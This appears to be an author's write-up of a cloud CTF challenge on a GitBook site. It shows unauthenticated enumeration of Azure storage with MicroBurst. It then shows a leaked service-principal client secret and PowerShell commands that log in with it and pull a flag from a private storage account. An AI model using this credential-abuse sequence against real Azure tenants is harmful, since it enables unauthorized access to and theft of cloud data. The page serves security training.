Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. Authored
  2. Lag and Crash 2023

Cloudy with a chance of meatball

PreviousPickle RickNextNYP InfoSec December CTF 2022

Last updated 4 months ago

Was this helpful?

Difficulty
Points
Solves

Medium

500

3

Description

Today in school, I learnt to code in HTML! View my brand new website! Hint 1: Identify how the website is hosted using what services

Hint 2: Enumerate your role and the allowed actions

Viewing the website, we can identify that it is hosted on some azure services

Refering to HackTricks

From the MicroBurst output, I have identified 2 files, /private/instructions.txt and /root/flag.txt

The /root/flag.txt shows a troll flag but /private/instructions.txt has some juicy information.

instructions.txt
Note to self:

Credentials for accessing the tenant. 
Hopefully no one can see this...

Tenant ID: c11b22d2-d015-47e0-bc0b-e6a0b1e25993
Application ID: ee767510-7041-4930-a672-1217ff9ff51a
Client Secret: pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ

Since I have a set of credentials, we are able to use Azure PowerShell module to login with the service principal

$appid="ee767510-7041-4930-a672-1217ff9ff51a"
$secret="pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ"

$tid= 'c11b22d2-d015-47e0-bc0b-e6a0b1e25993'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Next, I can enumerate the resources our service principal has access to using Get-AzResource

I manage to identify that there is another storage account called lncctf2023private. I am then able to retrieve the flag from the private storage account

$rg="lncctf2023_cloudy_meatball_rg"
$saname="lncctf2023private"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container flag
Get-AzStorageBlobContent -Blob flag.txt -Container flag -Destination flag.txt -Context $ctx

Flag: LNC2023{aZuR3_pUbL1C_c0ntAiN3R_i3_n0T_s0_s3cuR3}

Since there isnt much information, other than the domain name, we can use to perform unauthenticated enumeration.

MicroBurst
www.lncctf2023.tk
Az - Unauthenticated Enum & Initial EntryHackTricks Cloud
Logo